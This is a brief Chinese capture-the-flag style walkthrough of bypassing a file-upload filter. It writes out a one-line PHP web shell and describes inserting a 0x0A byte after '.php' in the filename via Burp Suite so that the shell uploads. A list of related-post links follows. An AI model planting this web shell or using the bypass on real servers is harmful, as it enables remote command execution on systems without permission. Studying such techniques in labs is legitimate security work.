Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
毕设源码-赖学姐5 小时前
【开题答辩全过程】以 高校学科竞赛管理系统安全开发为例,包含答辩的问题和答案麦聪聊数据5 小时前
智慧医疗数据互联互通:使用 QuickAPI 构建实时诊疗数据交换层Cisco_hw_zte7 小时前
小型网络中部署Aruba无线啥都想学点8 小时前
kali基础介绍(Reconnaissance侦察)枫眠QAQ10 小时前
hackthebox Cicada靶机学习中的DGR10 小时前
[极客大挑战 2019]Http 1 新手解题过程乐迪信息10 小时前
乐迪信息:AI防爆摄像机在船舶监控的应用unable code10 小时前
磁盘取证-[第十章][10.1.2 磁盘取证方法]磁盘取证1啥都想学点10 小时前
kali 基础介绍(CredentialAccess——凭证访问)天天睡大觉10 小时前
Python学习12